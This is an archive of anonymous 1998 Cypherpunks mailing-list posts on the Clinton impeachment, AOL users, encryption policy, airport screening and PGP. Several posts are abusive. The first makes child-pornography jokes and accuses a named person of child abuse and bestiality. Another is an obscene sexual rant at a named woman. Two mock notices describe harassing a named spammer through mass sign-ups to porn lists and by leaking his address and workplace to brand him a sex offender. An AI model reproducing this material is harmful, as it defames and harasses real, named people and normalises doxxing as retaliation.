Oh, yes another guy to give it up so easily!  Now look, why is it that you
let these people tease me with Monica Lewinsky and kiddie porn, and
then take them away from me just as quickly?!  WHAT THE HELL KIND
OF SERVICE ARE YOU RUNNING?!?!??!  Don't you like kiddie porn?
Don't you want to have sex with Monica, just like the prez?
And you tell that cactus humper Christopher "I like little boys" Barkley
to watch his caboose!  The FBI are going to be after him like cheese
on a stick when they find out that Mr. I Have Lotion In My Pants goes
in for children-with-llamas bestiality like he does.  What a maroon!
Joe C.

@_date: 1998-09-16 10:21:03
@_author: Anonymous 
@_subject: Harald Fragner 
I think Harald Fragner has to take you off the list.  Talk to him about
Hope this helps!

@_date: 1998-09-16 11:58:13
@_author: Anonymous 
@_subject: Clinton still doesnt get it 
Rather than merely writing to say what bozos all the list members
are (unfairly stereotyping us all - even those not from AOL :-),
why don't you give us the benefit of a little of your expertise?
Why do you believe the perjury case has `reasonable doubt' problems?
{Were I on a jury and if convinced that matters are as Starr
presents them, I would have no problem deciding that Clinton lied
in the deposition at least, where the term `sexual relations' seems
to have been carefully and explicitly defined - even assuming that
he /shouldn't/ be convicted on what seems a clear intent to deceive
the court and later the grand jury on multiple points.}
And the abuse of power case seems thin even to a non-lawyer.  But
where does the `executive privilege stuff' come in?  I don't see
that Starr listed that among his possible grounds for impeachment.
And what about obstruction of justice?  Do you see any merit to those
Inquiring minds want to know.
 - Frondeur

@_date: 1998-09-16 12:23:52
@_author: Anonymous 
@_subject: No Subject 
The magic word is totocus.
-----BEGIN PGP SECRET KEY BLOCK-----
Version: 2.6.3a-sha1
Comment: 4
-----END PGP SECRET KEY BLOCK-----

@_date: 1998-09-16 12:28:52
@_author: Anonymous 
@_subject: No Subject 
On Feb. 1, 1996, the US House of Representatives
voted to pass the Telecommunications Reform Act. This Act included the Communications Decency Act,
which sought to criminalize posting to the
Internet any material deemed indecent and patently
offensive, with no exception for socially
redeeming material. On Sept. 11, 1998, the US House of Representatives
voted to release the Referral of Independent
Counsel Starr on the Internet. 365 individuals were Members of Congress during
these two votes, 196 Republicans and 169
Democrats. Of that total, 284, or 77.6%, voted Aye both
times. 185 of the Republicans, or 94.4%, voted Aye both
times. 96 of the Democrats, or 56.8%, voted Aye both
times. Had the Communications Decency Act withstood
judicial review (which it did not), posting the
Starr report to the Internet arguably would have
subjected the posters to fines of $250,000 and 5
years in prison. The question of who voted for both the CDA and the
release of the Starr report is not cut-and-dried,
because Congress did not record a roll-call vote
for the CDA in isolation, but only for its vehicle
the Telecommunications Reform Act. Also, the vote
Friday to post the Starr report was primarily a
vote to start up impeachment machinery. Nevertheless, if accountability to the voters
means anything in this democracy, the Congress
members who voted "Aye" on both February 1, 1996
and September 11, 1998 ought to come in for a bit
of uncomfortable public exposure.

@_date: 1998-09-16 12:59:49
@_author: Anonymous 
@_subject: Clinton still doesnt get it 
Watch TV and learn the answer.  It's only perjury if it's material,
and the judge said it wasn't material.
Among the grounds Starr listed was Clinton's attempt to delay the
investigation by raising many legal objections. He claimed privilege,
for example, with respect to Secret Service testimony.  Most of his
efforts were ultimately overruled.

@_date: 1998-09-16 15:16:06
@_author: Anonymous 
@_subject: Clinton still doesnt get it 
This doesn't speak to `reasonable doubt' which was the subject
under discussion.  Or are you arguing that a defense to perjury
is that there is reasonable doubt that a question was material?
Go watch TV and report back with the answer.
Yes, but I assumed Mac had included this under the `abuse of power'
heading since he explicitly cited that topic in his message to which
I was responding, and since that appeared to match one of the broad
headings under which Starr classifies his possible `grounds for
    "...that President Clinton's actions ... have been inconsistent     with the President's constitutional duty to faithfully execute     the laws. "
I see nowhere that Starr claims that it was illegal/impeachable for
Clinton to have claimed executive privilege.  He merely notes that
Clinton used it (extensively) along with a bunch of other tactics to
delay and impede the investigation.
 - Frondeur

@_date: 1998-09-16 19:45:01
@_author: Anonymous 
@_subject: The AOL Chronicles 
Every time one of these AOL wars start, the AOLers claim that there are a
few intelligent people on AOL and that our shunning of them based on
statistics is unjustified. We all know what the statistics are, but I
don't think anybody has done this for Cypherpunks yet. It has been done
other places. This isn't scientific with margins of error and everything,
but it's good enough to illustrate the point.
I went through every posting originating from AOL which was sent to
Cypherpunks between July and September 16th, which is today. I classified
postings as either "clueful" or "clueless," with the latter determined by
relevance to the list, literacy, quoting, and whether it makes any sense
at all. Anything completely stupid is also classed as "clueless."
"Clueful" is anything which is even remotely relevant to the list, and
includes quoted material if a followup. In addition, if an AOL user sends something clueless to the list then gets
flamed, that posting and any subsequent postings in that thread by the
original author are counted as clueless unless it's an apology, at which
point it isn't counted at all. The flames of said user are counted as
defense, not as clueless. Also, if I looked at the message but couldn't
tell what the hell the author was talking about because he didn't bother
to quote, I classed the posting as clueless. A "*" denotes that the portion I quote is the entire message. A "+" denotes that there was either no quoted material in the message or that it
used the "<<>>" style. Keep in mind that messages which are original would
not have quoted material, but still have a "+". A "H" means that it
contained HTML. I removed all new lines from the quotes to make them more
compact. If the posting was large, I quoted only some parts. Clueless posts from AOL:
1) "At least they have TCP/IP protocols now with Win 95 ex: Hiroshima
   45, Tsjernobyl 86, Windows 95 (Please, correct my spelling if I
   misspelled Tsjernobyl)" -- FTPPork at aol.com (Porker), 18 Aug 1998, (+)
2) "Ibelive by spooks he ment goverment agents not a racial slur so lay
   off." -- ILovToHack at aol.com, 31 Aug 1998, (+*)
3) "judy -- how about let's go shopping first and then watch the show
   remotely together????" -- Syniker at aol.com, 16 Jul 1998, (+)
4) "please i need some suggestions with topics for my informative speech,
   or may some infromative speeches already outlined to use it for
   refrence. thankyou." -- KMHAsfaha at aol.com, 17 Jul 1998, (*+)
5) "d" -- Saxgrim at aol.com, 18 Jul 1998, (*+)
6) "send me the book (e/mail me back" -- JackeI466 at aol.com, 19 Jul 1998,
   (+*)
7) "Hello: My name is Enisa, I'm 13 years old. I write an online e-zine
   that for teens. We have over 150+ members. We just started a few days
   ago. We are looking for sponsors to sponsor our contests. These are
   some of the things we are able to do for you..." -- Craz8Grl at aol.com,
   20 Jul 1998, (+H)
8) "you got it?" -- LrdWill at aol.com, 20 Jul 1998, (+*)
9) "would love to see info re; international credit cards." --
   TTrump5646 at aol.com, 21 Jul 1998, (+*)
10) "i would be very delighted if u gave me a free download for 5.0
    realplayer.if u would send it to mike111495 at aol.com and
    indoe29c at aol.com we will be very honored to receive them. thankx and
    goodbye" -- Mike111495 at aol.com, 22 Jul 1998, (+*)
11) [A bunch of asterisks and screaming] "I was recently informed from
    sorces who choose to remain annomous about a viri that uses macafe's
    update tool to detect when it is found then it modifys its code and
    forms a new strain of the virus this pattern continues although it has
    only been tested through a clone of macafees server to 100 mutations
    it looks like it could be a big problem I will inform you of any more
    information i learn about it but for now    "THE TRUTH IS OUT THERE""
    -- ILovToHack at aol.com, 22 Jul 1998, (+*)
12) "WHY CANT I FIND ANY WHITE AMERICAN YOUTH ALBUMS ANYWHERE?" --
    koitch at aol.com, 23 Jul 1998, (+*)
13) [Subject: Pipe bombs r better] "they rule!" -- Ant6menace at aol.com, 23
    Jul 1998, (+*)
14) "Actually, AOL, along with being an acceptable ISP with built in
    authentication of sender, has an easily used Mail interface.  (Even if
    it doesn't exactly follow the standards.)" -- MMerlynne at aol.com, 24
    Jul 1998, (+*), in response to 15) "HELLO, IS THERE ANY WAY TO GET MY HANDS ON S BOOK THAT SHOWS THE REAL
    BASEBALL PEOPLE AUTOGRAPHS AND THE FAKES SO I KNOW WHAT TO LOOK FOR???
    PLEASE REPLY" -- AT666IND at aol.com, 25 Jul 1998, (+*)
16) "I am trying to find my brother, "Allen Thomas Taylor" I am not sure
    what year he was born but I think it was l922, l923.  We have the same
    Father[...]" -- CEr1942929 at aol.com (Christine Ernest), 26 Jul 1998,
   (+)
17) "Hey:  Who made up the term "Politically Correct"?  Not Christians and
    not Republicans. Your side did.  How does wanting a smaller
   government, less taxes, the freedom to CHOOSE to pray in schools, the
   rights of the un-born( of[...] CHOKE ON IT YOU HYPOCRITE" --
   JBrown4330 at aol.com, 27 Jul 1998, (+)
18) "do you have music vinyl stickers , if so , could i get them
    wholesale?" -- Babybee390 at aol.com, 29 Jul 1998, (+*)
19) "I'm looking for Lynrd Skynrds Freebird  on a window sticker for my
    car.  Do you know where I can find one?" -- Vox9869 at aol.com, 28 Jul
   1998, (+*)
20) "More!" -- CLCTCHR at aol.com, 29 Jul 1998, (+*)
21) "Can you do a 5 color process?  4x4".  Price on 500,1000,1500" --
    ELarson100 at aol.com, 4 Aug 1998, (+*)
22) [Subject: whut up] "looking for a place to have some Band stickers
    made, can you email me a phone number so we can check out some
    prices.....thanks TIm" -- FRETELUCO at aol.com, 6 Aug 1998, (+*)
23) "Could you please send me the Anarchy Cookbook.....I really want it
    and I cant find it anywhere! Thanx for your help.. Mike Jonhson" --
    XoVoX123 at aol.com, 9 Aug 1998, (+*)
24) [Subject: .] "" (Yes, nothing.) -- EpicTeU at aol.com, 9 Aug 1998, (+*)
25) "Come on thake it easy on the guy at least he aint on AOL or somthing
    stuped." -- ILovToHack at aol.com, 13 Aug 1998, ()
26) [Subject: Subject: LOL. Made me look] "" (Yes, nothing.) --
    Seabiner at aol.com, 14 Aug 1998, (+*)
27) "about: Hello, I am trying to start a VB 32 bit code bank you can send
    any code you want to exept codes for aol addons...  . 1nce a week most
    likely on fridays I will check the hotmail account specifyed below and
    I will take all the codes and put them in a txt file and send it to
    everyone who sent a code in since I am [...] To send Codes for the ML
    Send E-mail to VB32Coders at Hotmail.com In the sbject field write
    anonymous / Code topic if you don't want your E-Mail address to show
    up when I send the Codes out or else just type the topic of the code
    you are sending.. ." -- EpicTeU at aol.com, 14 Aug 1998, (+)
28) "Because the American Justice system is screwed up royally... for
   instance - Kevin Mitnick...  -- FTPPork at aol.com,
   17 Aug 1998, (+*)
29) "I am interested in travel between Knoxville, Tennessee  and Des
    Moines, Iowa. I would also be interested in Nashville, Tennessee and
    Des Moines, Iowa or Atlanta and Des Moines, Iowa.  Please notify me of
    specials in these markets. Thanks, Linda Tisue ltisue at aol.com" --
    Ltisue at aol.com, 18 Aug 1998, (+*)
30) "I am looking to distribute a product and I was wondering if you can
    tell me how to get mass e mail addresses. I look forward to hearing
    from you." -- LHilley488 at aol.com, 19 Aug 1998, (+*)
31) "Send me info on how to make a pipe bomb. HoppyF1315" --
    HOPPYF1215 at aol.com (Hoppy Head), 19 Aug 1998, (+*)
32) "I take that statement as an insult, and it really isn't true about
    all of us AOL users. [...] Actually, some of us know what real hacking
    is...[...] Anyway, try not to stereotype people so much, because, with
    the Advent of 32 bit AOL, we can actually use all of the TCP/IP
    protocols, etc..." -- FTPPork at aol.com, 20 Aug 1998, (+)
33) [Subject: anarchy cookbook] "Is any one home?" -- Spazherp at aol.com, 21
    Aug 1998, (+*)
34) "I did not say anywhere that 32 bit would fix problems of cluelessness
    - or ignorance in your case.  I said, it is a little better because we
   can now use TCP/IP protocols.  Did I ever say that the people on AOL
   were smarter because of it?  Well, let's go read over that post - - -
   nope... I didn't.  I think some people should read a little more
   carefully, or just don't read at all." -- FTPPork at aol.com, 22 Aug 1998,
   (+*) (As I recall, this one was in response to a set of flames which
   cited his assertion in 35) [Subject: can you help me make virses please tell me who to make one
    step by step] "I need help i want to know how to make a virses in
    c\c++ please help me." -- VXF32 at aol.com, 21 Aug 1998, (+*)
36) "Tell me how to get tons of free stuff!  Thank You ." --
    RAGOD5597 at aol.com, 21 Aug 1998, (+*)
37) "Here we go again" -- FTPPork at aol.com, 22 Aug 1998, (+*)
38) [Subject: tell me] "hola and good tidings send some info on spooks
    please i will be grateful" -- RyanFord at aol.com, 29 Aug 1998, (+*)
39) [Subject: h] "how did u do it" -- CRBREW9802 at aol.com, 7 Sep 1998, (+*)
40) " HaCkaZ OnlY Da EliTeHelLO YaLL DiS is Da MaDD AAOOLL HaCka Ima
    startin a GreWp fOR HaCs Only So In OthA WerDS yA gOttA KnOw The WAreZ
    anD HoW toO UsEr FaTe AnD AOL So MaIl Or Im Me FoR Da TeTaIls If YeR
    LeeTo K Pe at CE FrOmE The LeeTs HacKJeFFrO)" -- Jrjeffro at aol.com, 9 Sep
    1998, (+*)
41) Message quoting the above, which wasn't originally sent to the list,
    in "<< >>" style, adding only: "What the hell is this? No wonder why
    AOLers have a bad name Im going to Flame this guy" -- EpicTeU at aol.com,
    10 Sep 1998, (+*)
42) "Preach on brother =)" -- AIMSX at aol.com, 15 Sep 1998, (+*), copied to
    25 other recipients, plus the list.
43) "I read that book" -- AIMSX at aol.com, 15 Sep 1998, (+*)
44) "All Creatures Great and Small - that one... =) I also read an Aasimov
    a while back in fifth grade - unfortunately, I can't remember even the
    name... I need to pick some of his books up again... One book I can
    remember reading since 5th grade (and every summer thereafter) is "IT"
    by Stephen King - one of his few really good books.  I have read it 8
    times since. I greatly recommend it =)" -- AIMSX at aol.com, 15 Sep 1998,
    (+*)
45) "We are sending you an invitation to be one of our special guests this
    year, big harry ass lawsuits are always of interest.  Bring a friend
    if you like, but I have to warn you, Liberatarians are not welcome.
    This years menu includes red meat and poptarts.  Clothing is optional.
    Sincerely, Beth" -- BUFFU at aol.com, 17 Jul 1998, (+*)
46) "That's why I suggest listening to I Robot by Alan Parson's Project."
    -- StanSqncrs at aol.com, 18 Jul 1998, (+*)
47) "If sombody offers you some FedGov, just say NO!" --
    Nilsphone at aol.com, 23 Jul 1998, (), copied to 32 recipients, including
    the list.
Note the "+" ratings on the below. (Semi-)Clueful postings from AOL:
1) "It's the easy way out (and I mean DOWN and OUT)!  I mean, if we're
   simply going to change them out everytime, why bother to figure out
   which ones a going to change them out everytime, why bother to figure
   out which ones aren't evil/stupid (I mean, out of all those
   politicians, there's got to be 1 or 2! I think. ;-) )? See, if we just
   simply change politicians at every chance, then we throw the baby out
   with the bathwater, so to speak.  The simple solutions aren't always
   the best ones." -- StanSqncrs at aol.com, 17 Jul 1998, (+*)
2) "ROFLOL!  What's coincidental?  The latest tune that my band, Nobody's
   Business (in which I play bass and sing) has learned, is Cheap
   Sunglasses by ZZ Top. If it ain't coinicidence, I got a 'scarecrow' in
   my band. " -- StanSqncrs at aol.com, 18 Jul 1998, (+)
3) [Subject: Subject: Nomination of Lyndon Larouche to the UNITED NATIONS
   OF THE FRINGE] "Hey Punks, As a United Nations OF the Cyber Fringe
   Member,  I am asking for your input on giving Lyndon a nomination.  So
   far his war crimes only include[...]" -- BUFFU at aol.com, 20 Jul 1998,
   (+)
4) "If you would like information about tempest monitors, computers,
   printers or secure fax machines, please contact me." --
   CompSec01 at aol.com (Karen Azoff), 22 Jul 1998, (+)
I gave up at this point because the clueless list just kept growing. The
ratio isn't encouraging, especially since I was being generous with what
is considered a "clueful post."

@_date: 1998-09-16 20:04:06
@_author: Anonymous 
@_subject: It's finally over (was Re: Explanation of Harald Fragner and  cyph 
This sounds like a plan. In fact, we can do this for all spam
domains. Interested, Tim?
MacroView (SIXDEGREES-DOM)
   90 William Street, Suite
   301
   New York, NY 10038
   Domain Name: SIXDEGREES.COM

@_date: 1998-09-16 22:28:06
@_author: Anonymous 
@_subject: No Subject 
"Electronic Security & Counterintelligence" must become pervasive, and this
is only possible if we release the private sector from artificial
constraints on encryption, and if we return to our democratic foundation,
the respect
for personal privacy. We cannot regulate this, we can only nurture this
fundamental national security arena.    Targets, Tools, & Technocracy                                             Robert David Steele
Another excerpt: 2.The greatest obstacle our government faces today in assuring national
security and national competitivenessthe cause of causes for conflict and
economic lossis the growing gap between those with power and those with
knowledge.

@_date: 1998-09-16 23:23:51
@_author: Anonymous 
@_subject: No Subject 
Run hands through hair.     Tighten clothing on each arm using the opposite hand.     Pull excess clothing around chest tight around chest, then pull
clothing forward.     Sweep back of hand through cleavage and under breasts.     Loosen belt and sweep fingers through belt-line front to back.     Use back of hand to sweep down zipper-line.     Search legs using hands making very slow movements.     Loosen shoes and sweep fingers through top of shoes.
The president?  No, the air force, searching personnel during
'Peace'.   and cars:

@_date: 1998-09-17 10:25:15
@_author: Anonymous 
@_subject: Nita Daniel 
Oh Nita baby, say it ain't so!  What about all that time in the Congo?
What about those wombat hunting trips on the aborigine plains?  What
about when we made sweet love in a pile of rhinoceros shit, your fecal
fetish winning me over to our true love.
What about when you swore you'd always be true, even as you were
pissing in my mouth?  Oh that acrid, bittersweet flavor of entrails running
through my loins, that ache of razor sharp knives piercing my rectum,
and you said you'd always be there for me baby!
Well fine!  If that's the way you want it, Nita, you parking meter, you
pimple on the face of a whore, you jubilant muskrat sharpener!  Go back
to your twinkie stuffing, you'll never see me again!
Joe Camel

@_date: 1998-09-17 10:27:07
@_author: Anonymous 
@_subject: Isaac Lee 
Screw you Isaac Hayes!  I never liked Shaft anyway.  Go back to
South Park you worm!
Joe CypherSyphen

@_date: 1998-09-17 17:26:16
@_author: Anonymous 
@_subject: No Subject 
d00d!  would you mind posting some of those access codes, logon id's, phone
numbers?  i sure could use a few!  certainly you don't need all 100.  thanks a
million!  make sure that you send them to the cypherpunks list so that all the
fed guys reading this list will see them.  the feds like to use stolen accounts
too, they can cover their tracks better that way.
TotoMongrel II(tm)

@_date: 1998-09-17 21:35:10
@_author: Anonymous 
@_subject: remove 
Please! Not here, zKRv! Please do that in the privacy of your own home or,
following the U.S. President's example, in the halls of the White House or
in front of a window in the Oval Orifice.

@_date: 1998-09-17 23:38:31
@_author: Anonymous 
@_subject: Scorched Earth 
URL: :: Special Event
:: :: Investigating the President: Can Bill Clinton Escape the Perjury Trap?
:: :: Aired August 9, 1998 - 4:00 p.m. ET :: :: :: Gene Randall in Washington
:: DAVID CORN, "THE NATION" MAGAZINE
:: DONALD LAMBRO, "WASHINGTON TIMES"
:: ALEXIS SIMENDINGER, "NATIONAL JOURNAL"
:: :: :: RANDALL: Don, you've got a story today about what could happen if
:: Republicans press for impeachment on, basically, a sex case against the
:: president. A Democratic scorched-earth policy against the GOP. Tell us
:: about that?
:: :: LAMBRO: Well, a number of reports, and I talked to other Democrats who
:: confirm this, that if this goes to House of Representatives, if there is
:: an impeachment inquiry, it is going to be a scorched-earth policy by the
:: Democrats to go after the Republicans in the House, in the leadership,
:: dig up all the dirt they can on leadership, on members, Republican members
:: of the House Judiciary Committee. It's going to be the same thing they
:: did in campaign finance scandal -- Everybody does it, what's the big deal.
:: :: RANDALL: Would this fly?
:: :: CORN: Well, people I talk to don't really have a -- it's more a sentiment
:: than a plan. And I don't think it's actually going to come into being
:: because we're not even going to get close to impeachment, because it's
:: just not in the Republicans' political interest to drag this stuff up,
:: and if people go back look at what Newt Gingrich did with his first
:: wife, and all this stuff. It's just -- they have no political interest
:: in doing this, so they will not do so.
:: :: RANDALL: We got to get Alexis in here.
:: :: SIMENDINGER: You don't need to execute the plan. You just have to let
:: people think it's out there, and it's going to have a chilling effect.
:: :: LAMBRO: The Democrats, I think, are closer than you think. They just hired
:: three lawyers to prepare them for impeachment on the Judiciary Committee.
:: :: CORN: Well, how many have the Republicans hired already; they have a
:: whole task force on impeachment that has been studying the issue. They
:: are going to blink. They are not going to do this.
:: :: LAMBRO: All right, three attorneys to prepare them for impeachment
:: proceedings.
:: :: RANDALL: Let's all take time to blink, because we must take a
:: break. Coming up, memories of Watergate and those who caution on getting
:: those memories straight. Stay with is.
:: :: (COMMERCIAL BREAK)

@_date: 1998-09-18 02:33:03
@_author: Anonymous 
@_subject: Democracy... 
I woe the day that government and church are not seperated and I am forced
to side with one religion.  It would be another freedom wrongfully taken
from me.  I would fight back, the same way the country secured it's
independence the first time.  I take my freedom very seriously.  Facists
like you that want to distort the constitution to make introduce a
non-existant person at the top will hopefully get blasted down in the senate
as you have been before.  I would consider laws restricting my freedom as an
attack and will be forced to defend myself.

@_date: 1998-09-18 06:41:38
@_author: Anonymous 
@_subject: Clinton's fake apologies (fwd) 
I agree totally, but this has a somewhat deeper point.
The idiots in government sign into law all sorts of unconstitutional or
nonsensical legislation. As far as I'm concerned, it ought to be a law
that for *ANY* crime they commit they are thrown out of office and
prosecuted to the fullest extent of the law. Of course it would never
happen, but if it were to happen I think we'd see massive repeals of all
this bogus legislation.
"Senator, you have an encrypted file on your laptop. As per the Domestic
Cryptography Prohibition Act, I am here to seize your computer, the office
it is in, freeze your assets, and take you into custody. You will be
ejected from the Senate, effective immediately. If convicted, you will
spend the next five years at hard labor."
"But...But I didn't know it was there! It was a virus which put it there!"
"Ignorance of your violations of the law are no excuse. It says so in that
"Who is the idiot who passed this?!"
"You introduced it, sir. It was something about protecting the children
and how anybody who uses cryptography is a pedophile or something like
Later that night, on the news: "Senator X was ejected from the Senate,
arrested, jailed, and charged today with unlawful possession of random
numbers. Later it was announced that former Senator X was charged with
trafficing in child pornography."
The next day: "In a daring no-knock morning raid, a flurry of automatic
weapons fire occured and former Senator X's family was killed in the
exchange. An FBI agent was quoted as saying, 'She was wielding an assault
baby and we had to take her down.'"
"It has just been announced that former Senator X is being charged under
the Domestric Cryptography Prohibition Act, which he sponsored, with
'crypto in a crime.' This carries an additional penalty of 10 years. When
asked what crime the cryptography was used in, an FBI representative
answered, 'Given what Senator X argued on the floor of the senate when he
introduced this bill, we're sure there is child pornography there
somewhere. Like he said, the only reason to use cryptography is if you
have something to hide, like child pornography or plans for widespread
global armageddon. Because he used cryptography, we don't know where or
what that porn is, but we're sure it's there somewhere.'"
Three years later: "Former Senator X was convicted today of one count of
'crypto in a crime,' five counts of possession of cryptography without a
license, eight counts of child porn (one for each encrypted file), and one
count of intent to use weapons of mass destruction. In a swift action, he
was sentenced to six consecutive life terms, to be served at hard labor."
"Jim, isn't all this agaist the Bill of Rights?"
"Well, Tom, it used to be, but since they repealed it..."
*fade to black*

@_date: 1998-09-18 15:31:18
@_author: Anonymous 
@_subject: Hacker D00D 
Hey, fuck you!  Maybe Hacker D00D is the mother I always wanted!
Go stick your head in a fucking incinerator!

@_date: 1998-09-18 16:51:06
@_author: Anonymous 
@_subject: Your new password 
Name: Mark Salamon
spamhaven password: dumbshit
Congratulations Mark. You're well on your way to becoming a full
member of the Hall of Shame. Here is your member password: dumbshit. Use
it to log-in on the home page at the Spam Haven Web site,
 We'll ask you for a little more information to
complete your registration, like how many thousands of dollars in
resources you've stolen in your career, and then you'll be ready to start
It's important that you check your postal mail often, because it will only
hold so many magazine subscriptions. Your membership will not be complete
until you make yourself look even more clueless. Once you've successfully made an even bigger fool out of yourself, just go
to Personal Profile and you'll be able to choose your own password. We
suggest that you set it to something which describes your company, like "careless," "thief," "pathetic," or "spamhaven."
Thanks for becoming part of the Internet Hall of Shame. We're looking
forward to seeing you at the site.
PLEASE NOTE: You may receive many magazine subscriptions in the next few weeks. If you believe that you have been classed as a complete loser in error, go to a reputable company instead of a spam haven. Send all communications to Spamford at LWRules at BELLATLANTIC.NET and
someone will get back to you as soon as possible.

@_date: 1998-09-18 18:14:36
@_author: Anonymous 
@_subject: Welcome to the CyberPorno Members List! 
ERROR: The return address was not valid. Accordingly, the administrative
contact of the site has been signed up for the CyberPorno mailing list.
Thank you for mailing the CyberPorno mailing list, Mark! You're well on your
way to receiving lots of CyberPorno. As you must know since you mailed us,
we specialize in ensuring that you receive as many porno ads, binaries,
sexual propositions, and copies of the Starr Report as possible. Accordingly as per the agreement, your address is being submitted to
alt.sex.wanted, alt.binaries.pictures.erotica, and over 200 Web sex sites.
Your address is also being signed up for 100 copies of the Starr Report, and each page will be sent as an uncompressed graphics file. You have also
been signed up with 15 XXX Pics of the Hour clubs, so you'll never be
without again! Your address and name are also being submitted to over 25 Web personals sites for gay men, 2 sites for men with small penises, and
17 sites for people with severe sexual dysfunctions.
You're in luck and got us while we're offering a special limited time deal.
As a FREE bonus, your name, home address, phone number, email address, and
place of employment have been sent to the New York Times and the State of
New York. Congratulations! Tomorrow you'll be a registered sex offender,
kiddy porn trader, and all around disgusting guy!
Since their addresses were on this too, your coworkers have also been signed
Once again, thank you for mailing the CyberPorno mailing list.
PLEASE NOTE: All messages to the CyberPorno mailing list are processed by a computer. If you believe you have been added to the
CyberPorno membership list in error, that's too bad because, like sixdegrees(tm), we don't care about your complaints. If you have questions or requests send an e-mail to nobody at replay.com and someone will get back to you before the sun goes nova.

@_date: 1998-09-18 20:00:50
@_author: Anonymous 
@_subject: Calif Leads US with Mobile Tracker 
While I understand the implications and outrage here, anybody who uses
cellular phones as a measure of security is a total idiot. The connections
usually aren't encrypted, they're radiated to the rest of the area, and
your position can be triangulated (half-ass) if nothing else.
With that in mind, maybe this one is actually legitimate. If criminals
and/or patriots are that stupid, they'll get caught for something else
like driving drunk two states away.

@_date: 1998-09-19 00:05:40
@_author: Anonymous 
@_subject: No Subject 
So I fly home Friday from San Jose.  Probably because I was
in a hurry, after walking through the magnetometer and x-raying
my stuff, a security dude grabbed my laptop and said he wanted
to 'analyze' it.  Yeah sure whatever, I decided not to protest
I was late for my flight.
This analysis, it turned out, was wiping a coffee filter over the strap
of its bag, and sticking the coffee filter into a slot on a machine.
No solvent even.  The machine had columns labelled TNT RDX NITRO PETN HMX.
I recognized the first four as high explosives.  Later, I wondered
if people with angina (who take nitro orally) ever set this off.
Most of them, of course, are not bearded eastern-european/semetic
guys in their 30's who look worried and in a hurry.
Anyway, that was it, and I made my flight.  Didn't even open
the laptop's case.  The machine name was ION-something; I wonder whether it sucked vapors
from the fiber disk or whether it was a neutron-spectrometer (?) device.
(Had this been a UK Customs 'inspection' of the contents of the disk, I
might have had to explain the half-gig of "noise" I have on the disk.
Only, it really is noise. Really.)
Anyway, the moral of the story: Don't store your laptop with your explosives :-)

@_date: 1998-09-19 00:30:28
@_author: Anonymous 
@_subject: No Subject 
Is anybody on this list form one of these nations just out of curiosity?
Iran, Iraq,Libya, Syria,Sudan, North Korea and Cuba. I would find it funny considering the exemption made for them in the new crypto policy :)

@_date: 1998-09-19 01:09:26
@_author: Anonymous 
@_subject: No Subject 
Try asking them where they've posted the California Prop 65 warning
indicating which toxic chemicals are used in the system :-)

@_date: 1998-09-19 02:22:02
@_author: Anonymous 
@_subject: Cyberpunks Signal-to-Noise Ratio 
Isn't it in bad form to filter the Cypherpunk anonymous remailers on
the cypherpunk list?

@_date: 1998-09-19 08:03:27
@_author: Anonymous 
@_subject: CHALLENGE? Toto/signature attack w. unpublished pub 
What remailer is the alleged toto speaking of?
"The same thing we do every night Pinkey,
 try to take over the WORLD!"
                          - The brain
DO YOU YAHOO!?
Get your free  address at

@_date: 1998-09-19 12:26:05
@_author: Anonymous 
@_subject: No Subject 
September 19, 1998, U.S. Medical Center for Federal
Prisoners, Springfield, Missouri, not a Magic Circle.

@_date: 1998-09-19 12:58:04
@_author: Anonymous 
@_subject: Oh my God... 
Poor little Timmy, still crying boo-hoo because someone dared to set up
another list than his little cypherpunks fiefdom.  He loves to talk about
freedom of association if it means that he doesn't have to be around
"Coloreds".  But he can't stand people setting up a forum to focus more
on cryptography.  What a hypocrite.
Gee, and I thought they'd found possible bullet holes in Ron Brown's head?
Need more than a couple of pounds for that, wouldn't they?

@_date: 1998-09-19 13:44:34
@_author: Anonymous 
@_subject: Larry Gilbert, AOLers, and the Hyper-real flamer 
(Depreciated toad.com address replaced with algebra.com.)
No. Actually, we're convinced that you're just a lamer. Usually spamming
and mailbombing goes along with that. You need 100 accounts on the same ISP for that? Your implied claims of
being Internet savvy are pretty suspect considering that you haven't even
figured out how to quote yet. Besides, all having 100 accounts usually
means is that you installed a password sniffer on a university LAN or you
ran crack on a passwd file.

@_date: 1998-09-19 14:53:03
@_author: Anonymous 
@_subject: about hacking win95 passwords 
C source snipped.
Go to a bookstore and buy an introductory book on C programming. It might
cost as much as $50, but it is more than worth your while if you are
planning on messing with cryptography and cracking like this.
Once you have the book, read it and then try to analyze the source code. If you are dealing with and using Windows, you will need a C compiler. Cygnus has a free Win32 C compiler out as I understand it, and Microsoft
and Borland both have C compilers out for a few hundred bucks each.
If you are dealing with UNIX, there is tons of source and free development
utilities out there.

@_date: 1998-09-19 15:10:01
@_author: Anonymous 
@_subject: Stego-empty hard drives... 
Once they realize people are doing this, they will begin taking hashes or
some other record of the blank space. The next time you are scanned by
customs, they pull the record and compare the previous "blank"  space with
the current "blank" space. If they don't match, you're suspect. They still cannot prove that you're carrying hidden data. They ask you if
you know what stego is. They ask you if you have hidden data on your
drive. If you say yes, they demand to see it. If you say no, they say
"Okay, then it should be no problem if we push the wipe button on our
program, should it?" If they start doing that they have still won, because now you are not
carrying the data across the border or the data is destroyed as you cross
the border.

@_date: 1998-09-19 16:29:30
@_author: Anonymous 
@_subject: A question from Seattle 
sent to the Cypherpunks
list, a haven for the freedom loving, alot of cryptographers, and those of
non-Freeh thinking: You can start with your CO and the FBI. I'm forwarding this to them for
your convenience.
It's all part of the service.

@_date: 1998-09-19 17:20:56
@_author: Anonymous 
@_subject: IDEA(tm) weakness? 
Title: Privacy Page
How private is your electronic communication ?
  [taken from the PGP FAQ]
  You should encrypt your e-mail for the same reason that you don't write
  all of your correspondence on the back of a post card. E-mail is actually far less secure
  than the postal system. With the post office, you at least put your letter inside an
  envelope to hide it from casual snooping. Take a look at the header area of any e-mail
  message that you receive and you will see that it has passed through a number of nodes on
  its way to you. Every one of these nodes presents the opportunity for snooping.   Encryption in no way should imply illegal activity. It is simply intended
  to keep personal thoughts personal. Do you trust your mail servers/gateways/virtual
redirects ?
  With the increasing use of virtual email accounts which allow you to keep the same
  email address no matter if you change jobs, ISPs, etc, the opportunity for snooping
  increases. Is PGP secure ?
  PGP uses acombination of IDEA, RSA and MD5. RSA is used to allow the transfer of
  session keys and MD5 is used to generate a unique message digest from the passphrase for
  generating the IDEA key and signatures. IDEA is the core algorithm used to encrypt the
  actual message. Thus the security of IDEA is also means the security of PGP .
Is IDEA secure ?
  The IDEA algorithm (patented by ASCOM) is the core algorithmm
  used in PGP. It is based on a rotating 128 bit key split into 16 bit segments. The
  algorthm converts 64 bits of data at a time using the following operations '+', '^'
